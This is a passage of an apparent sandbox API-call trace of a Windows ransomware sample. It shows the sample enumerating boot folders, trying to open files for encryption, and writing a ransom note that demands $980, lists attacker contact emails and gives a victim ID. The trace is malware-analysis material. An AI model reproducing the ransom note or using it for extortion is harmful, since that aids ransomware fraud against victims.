hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.561] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0188.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.561] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 0 [0188.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0188.561] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0188.561] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0188.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0188.562] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\_readme.txt" (normalized: "c:\\boot\\ru-ru\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0188.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0188.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.563] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*" (normalized: "c:\\boot\\ru-ru\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0188.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.563] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.563] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0188.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.564] PathFindExtensionW (pszPath="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned=".mui" [0188.564] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.564] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0188.564] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0188.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0188.565] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0188.565] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.578] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.578] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 